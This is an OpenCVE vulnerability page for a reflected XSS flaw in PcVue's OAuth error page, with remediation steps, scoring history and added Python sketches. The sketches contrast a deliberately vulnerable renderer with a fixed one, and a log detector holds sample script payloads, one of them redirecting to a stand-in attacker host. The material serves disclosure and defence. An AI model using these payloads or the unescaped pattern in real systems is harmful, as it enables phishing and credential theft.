Description
An XSS vulnerability affects the OAuth web services used by the WebVue, WebScheduler, TouchVue and SnapVue features of PcVue in versions 12.0.0 through 16.3.3 inclusive. It might allow a remote attacker to trick a legitimate user into loading content from another site upon unsuccessful user authentication on an unknown application (unknown client_id).

This vulnerability only affects the error page of the OAuth server.
Published: 2026-02-26
Score: 5.3 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑site scripting via OAuth error page after failed authentication
Action: Apply Patch
AI Analysis

Impact

An XSS flaw (CWE‑79) exists in the OAuth web services used by PcVue’s WebVue, WebScheduler, TouchVue and SnapVue components in versions 12.0.0 through 16.3.3. When an authorization request names a client_id the OAuth server does not know, authentication fails and the server returns an error page that echoes request‑controlled content without neutralizing it (the unrecognised client_id is the obvious candidate). Because the payload travels in the request and comes straight back in the response, this is reflected XSS: the attacker crafts an authorization URL for a bogus client, gets a legitimate user to open it (both CVSS vectors require user interaction), and the script executes in the victim’s browser under the OAuth server’s origin, where it can pull in content from an attacker‑controlled site. That is enough for convincing phishing (for example a fake login form shown right after an apparently genuine failed login), credential theft, and arbitrary script execution within the victim’s browser session.
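As an added illustration of the pattern described above (this is not code from the OpenCVE analysis or from ARC Informatique, and PcVue’s real OAuth implementation is not shown on this page), the Python sketch below models an authorize endpoint that serves an error page for an unknown client_id. The vulnerable renderer concatenates the value into HTML; the hardened one HTML‑encodes it. The host, the /oauth/authorize path, the allowlist of client IDs, the attacker URL and the extra response headers are all constructed for the example, not taken from the advisory.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed allowlist of client_ids the OAuth server knows (hypothetical values).
KNOWN_CLIENTS = {"webvue", "webscheduler", "touchvue", "snapvue"}

# Constructed attacker payload and crafted authorization URL (hypothetical host/path).
PAYLOAD = "<script>location='https://attacker.example/'</script>"
EVIL_URL = ("https://scada.example/oauth/authorize?response_type=code&client_id="
            + quote(PAYLOAD, safe=""))


def render_error_vulnerable(client_id: str) -> str:
    """Before: the unrecognised client_id is concatenated straight into the HTML.

    Whatever the request carried in client_id becomes part of the page, so a
    value containing markup or script is rendered as markup or script (CWE-79).
    """
    return ("<html><body><h1>Authentication failed</h1>"
            f"<p>Unknown application: {client_id}</p></body></html>")


def render_error_hardened(client_id: str) -> str:
    """After: HTML-encode the value (quote=True also escapes ' and ") and cap
    its length, so it can only ever be displayed as text."""
    shown = html.escape(client_id[:64], quote=True)
    return ("<html><body><h1>Authentication failed</h1>"
            f"<p>Unknown application: {shown}</p></body></html>")


def handle_authorize(url: str, render_error) -> tuple[int, dict, str]:
    """Minimal authorize endpoint: a known client_id proceeds, anything else gets
    the error page produced by render_error.  Returns (status, headers, body)."""
    query = parse_qs(urlsplit(url).query)          # percent-decodes the payload
    client_id = query.get("client_id", [""])[0]
    if client_id in KNOWN_CLIENTS:
        return 302, {"Location": "/login?client_id=" + client_id}, ""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # Generic defence in depth for a static error page (assumed hardening,
        # not something the advisory describes): no script may run at all.
        "Content-Security-Policy": "default-src 'none'; style-src 'self'",
        "X-Content-Type-Options": "nosniff",
    }
    return 400, headers, render_error(client_id)


def reflects_script(body: str) -> bool:
    """True if a <script> tag from the request survives verbatim in the response."""
    return "<script" in body.lower()


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_error_vulnerable),
                           ("hardened", render_error_hardened)):
        status, _, body = handle_authorize(EVIL_URL, renderer)
        print(f"{name}: HTTP {status}, script reflected = {reflects_script(body)}")
```

Encoding on output is the fix the CWE calls for; the CSP and nosniff headers only limit the damage if another reflection is missed, and the vendor’s patch, not this sketch, is what removes the defect from PcVue.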

Affected Systems

The affected product is ARC Informatique’s (Arcinfo) PcVue platform, specifically the OAuth web services behind its WebVue, WebScheduler, TouchVue and SnapVue features. The vulnerability is present in every release from 12.0.0 up to and including 16.3.3. Fixes ship in PcVue 16.3.4 (build 16.3.4902.3112) and PcVue 15.2.14 (build 15.2.14900.37147) and are delivered through the Web Deployment Console (WDC), so the patched WDC must be installed on the IIS Web Server and the Web Site redeployed before the fix takes effect. Systems on an affected release should update to the corresponding patched release or, if the Web & Mobile features are not needed, leave them uninstalled.

Risk and Exploitability

The CNA’s CVSS 4.0 score of 5.3 indicates medium severity (NVD’s CVSS 3.1 assessment is 6.1, with changed scope), the EPSS score below 1 % reflects a very low current likelihood of exploitation in the wild, the CISA SSVC assessment records no known exploitation and rates the flaw as not automatable, and it is not listed in the CISA KEV catalog. Exploitation needs a victim: the attacker cannot trigger the bug alone but must get a legitimate user to open a crafted authorization request that fails for an unknown client_id, at which point the error page renders the attacker‑controlled content in that user’s browser. The flaw is confined to the error page, the scoring rates the impact on the vulnerable system as low, and the consequences are limited to what script can do in the victim’s browser session, yet that is still enough for social‑engineering attacks against legitimate users. Administrators should treat this as an actionable risk: apply the vendor‑issued patch promptly and limit exposure of the affected control‑system network in the meantime.
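A triage check, added here and not part of the OpenCVE analysis or of any vendor guidance: because the vendor remediation places the OAuth web services on an IIS Web Server, attempts to reach the error page can be spotted in the IIS W3C log as authorize requests whose client_id is not one of the configured clients, and those whose decoded value carries HTML or JavaScript metacharacters are the ones to escalate. The log excerpt, the /oauth/authorize path, the field layout and the allowlist of client IDs are all constructed for this example; substitute the real authorize endpoint and the clients configured in the WDC.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (not real PcVue logs).  As in real IIS logs,
# the #Fields directive defines the column order and fields are space-separated.
# Two requests come from an outside address and carry markup in client_id.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2026-03-01 08:12:03 10.0.0.5 GET /oauth/authorize response_type=code&client_id=webvue&redirect_uri=https%3A%2F%2Fscada.example%2Fwebvue%2F 10.0.0.42 302
2026-03-01 08:13:10 10.0.0.5 GET /oauth/authorize response_type=code&client_id=%3Cscript%3Elocation%3D%27https%3A%2F%2Fattacker.example%2F%27%3C%2Fscript%3E 203.0.113.7 400
2026-03-01 08:14:55 10.0.0.5 GET /oauth/authorize response_type=code&client_id=touchvue 10.0.0.43 302
2026-03-01 08:15:20 10.0.0.5 GET /oauth/authorize response_type=code&client_id=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 203.0.113.7 400
2026-03-01 08:16:02 10.0.0.5 GET /webvue/index.html - 10.0.0.42 200
"""

# Hypothetical allowlist: the client_ids actually configured in the WDC.
KNOWN_CLIENTS = {"webvue", "webscheduler", "touchvue", "snapvue"}

# HTML/JS metacharacters and event-handler attributes that have no business in a client_id.
SUSPICIOUS = re.compile(r"""[<>"']|javascript:|\bon\w+\s*=""", re.IGNORECASE)


def parse_iis_w3c(text: str):
    """Yield one dict per log record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split(" ")))


def find_unknown_client_ids(text: str, known=KNOWN_CLIENTS,
                            authorize_path="/oauth/authorize") -> list[dict]:
    """Return authorize requests whose client_id is not an allowlisted client,
    flagging those whose decoded value carries HTML/JS metacharacters."""
    findings = []
    for rec in parse_iis_w3c(text):
        if rec.get("cs-uri-stem") != authorize_path:
            continue
        # parse_qs percent-decodes, so we examine the value the server actually saw.
        query = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
        for client_id in query.get("client_id", []):
            if client_id in known:
                continue
            findings.append({
                "time": f"{rec['date']} {rec['time']}",
                "src": rec["c-ip"],
                "status": rec["sc-status"],
                "client_id": client_id,
                "html_metachars": bool(SUSPICIOUS.search(client_id)),
            })
    return findings


if __name__ == "__main__":
    for finding in find_unknown_client_ids(SAMPLE_LOG):
        print(finding)
```

The query string is decoded before matching because the payload reaches the server percent‑encoded, as in the two flagged lines; a pattern applied to the raw cs-uri-query column would need to match %3C and friends instead. Typos in a client_id configured by a legitimate integrator will also surface as unknown clients, so the html_metachars flag, not the unknown client alone, is the signal worth paging on.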

Generated by OpenCVE AI on April 16, 2026 at 06:04 UTC.

Remediation

Vendor Solution

Harden the configuration

Who should apply this recommendation: All users

To reduce the risk of exploitation, ARC Informatique strongly recommends implementing the following defensive measures:

  • Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from insecure networks.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as its connected devices.

Uninstall the Web Server

Who should apply this recommendation: All users not using the affected component

If your system does not require the use of the Web & Mobile features, you should make sure not to install them. If your system requires the use of the Web & Mobile features, they should be installed only on the Web Server. See the product help related to the installation for more information.

Update the Web Deployment Console (WDC) and re-deploy the Web Server

Who should apply this recommendation: All users running affected components

Install a patched release of the Web Deployment Console (WDC) on the IIS Web server and use it to re-deploy the Web Site. Some settings might need to be updated if third-party web apps or services depend on the OAuth ROPC flow. In a patched release of the WDC, new settings are available for each authorized Client to enable or disable:

  • The Authorization Code flow
  • The Authorization Code flow with PKCE
  • The Resource Owner Password Credentials (ROPC) flow

By default, all the OAuth flows are now disabled for third-party web apps and need to be manually enabled before deployment if required.

To verify that the patch is applied correctly, you must check that:

  • The File version property of the file ./bin/Modules/WebDeployment/WebDeploymentConsole.exe matches the deployed release or later, and ensure that any earlier release is no longer used;
  • Web Sites have been redeployed;
  • OAuth flows are correctly set for each authorized Client.

Available patches:

  • PcVue 16.3.4 (16.3.4902.3112)
  • PcVue 15.2.14 (15.2.14900.37147)


OpenCVE Recommended Actions

  • Install the patched release of the Web Deployment Console (PcVue 16.3.4 or 15.2.14, as appropriate) on the IIS Web server and use it to redeploy the Web Site; the fix does not take effect until the site has been redeployed.
  • Verify that the patch is active by confirming that the File version property of ./bin/Modules/WebDeployment/WebDeploymentConsole.exe is 16.3.4902.3112 / 15.2.14900.37147 or later, that the Web Sites have been redeployed, and that the OAuth flows (Authorization Code, Authorization Code with PKCE, ROPC) are deliberately enabled or disabled for each authorized Client; they are all disabled for third‑party apps by default after the update.
  • If your deployment does not require the Web & Mobile features, do not install the Web Server component, which eliminates the vulnerable surface entirely.
  • Apply network hardening measures: isolate control‑system networks from business networks, limit external access, and where remote access is necessary use a VPN that is kept up to date, bearing in mind that it is only as secure as the devices connected to it.

Generated by OpenCVE AI on April 16, 2026 at 06:04 UTC.


Advisories

No advisories yet.

References
History

Thu, 12 Mar 2026 14:00:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Arcinformatique
                                      Arcinformatique pcvue
CPEs                                  cpe:2.3:a:arcinformatique:pcvue:*:*:*:*:*:*:*:*
Vendors & Products                    Arcinformatique
                                      Arcinformatique pcvue
Metrics                               cvssV3_1
                                      {'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}


Thu, 26 Feb 2026 15:15:00 +0000

Type                 Values Removed   Values Added
Metrics                               ssvc
                                      {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 26 Feb 2026 08:15:00 +0000

Type                 Values Removed   Values Added
Description                           An XSS vulnerability affects the OAuth web services used by the WebVue, WebScheduler, TouchVue and SnapVue features of PcVue in version 12.0.0 through 16.3.3 included. It might allow a remote attacker to trick a legitimate user into loading content from another site upon unsuccessful user authentication on an unknown application (unknown client_id). This vulnerability only affects the error page of the OAuth server.
Title                                 XSS vulnerability upon unsuccessful authentication
First Time appeared                   Arcinfo
                                      Arcinfo pcvue
Weaknesses                            CWE-79
CPEs                                  cpe:2.3:a:arcinfo:pcvue:*:*:*:*:*:*:*:*
                                      cpe:2.3:a:arcinfo:pcvue:12.0.0:*:*:*:*:*:*:*
Vendors & Products                    Arcinfo
                                      Arcinfo pcvue
References
Metrics                               cvssV4_0
                                      {'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:N/AU:Y/R:U/RE:M/U:Clear'}


MITRE

Status: PUBLISHED

Assigner: arcinfo

Published:

Updated: 2026-03-26T08:23:05.985Z

Reserved: 2026-01-30T08:38:05.262Z

Link: CVE-2026-1695

Vulnrichment

Updated: 2026-02-26T14:21:26.525Z

NVD

Status : Analyzed

Published: 2026-02-26T08:16:19.063

Modified: 2026-03-12T13:50:53.330

Link: CVE-2026-1695

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T06:15:26Z

Weaknesses